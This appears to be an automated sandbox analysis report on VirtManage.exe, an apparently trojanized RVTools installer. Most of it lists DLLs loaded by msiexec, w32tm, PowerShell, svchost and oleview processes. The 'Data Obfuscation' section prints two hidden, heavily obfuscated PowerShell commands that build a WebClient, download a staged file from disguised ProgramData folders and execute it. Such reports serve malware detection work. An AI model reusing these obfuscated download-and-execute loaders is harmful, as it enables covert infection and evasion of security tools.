Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe | Section loaded: mfc42u.dll
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe | Section loaded: aclui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: mfc42u.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: aclui.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: textshaping.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: uxtheme.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: textinputframework.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: coreuicomponents.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: coremessaging.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: ntmarta.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: coremessaging.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: wintypes.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: wintypes.dll
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: I Agree
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Next >
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\msiexec.exe | Window detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: VirtManage.exe | Static PE information: certificate valid
Source: VirtManage.exe | Static file information: File size 10522168 > 1048576
Source: VirtManage.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmp, MSI32C4.tmp.9.dr
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb= source: 7za.exe, 00000007.00000003.952369092.00000189E3440000.00000004.00001000.00020000.00000000.sdmp, MSI32C4.tmp.9.dr
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.pdb source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4F16000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000001E.00000002.1249340927.0000016E3046D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: OLEView.pdb source: 7za.exe, 00000013.00000003.1010646142.000001AC45EBA000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000013.00000003.1010553824.000001AC45EEA000.00000004.00001000.00020000.00000000.sdmp, oleview.exe, 0000001A.00000002.3333907718.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001A.00000000.1077218028.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001D.00000002.1300919090.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp, oleview.exe, 0000001D.00000000.1185413739.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.1251740114.0000016E30589000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb]mb-) source: powershell.exe, 0000001E.00000002.1251921332.0000016E305A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.1218645117.0000016E1620A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Pn.pdb source: powershell.exe, 0000001E.00000002.1249340927.0000016E3046D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: OLEView.pdbGCTL source: 7za.exe, 00000013.00000003.1010646142.000001AC45EBA000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000013.00000003.1010553824.000001AC45EEA000.00000004.00001000.00020000.00000000.sdmp, oleview.exe, 0000001A.00000002.3333907718.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001A.00000000.1077218028.00007FF7CD99D000.00000002.00000001.01000000.00000011.sdmp, oleview.exe, 0000001D.00000002.1300919090.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp, oleview.exe, 0000001D.00000000.1185413739.00007FF7F609D000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.pdbhP source: powershell.exe, 0000001B.00000002.3339050433.0000021BB4F16000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: tomation.pdb{AD.v source: powershell.exe, 0000001E.00000002.1251740114.0000016E30589000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';dir ect*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline"
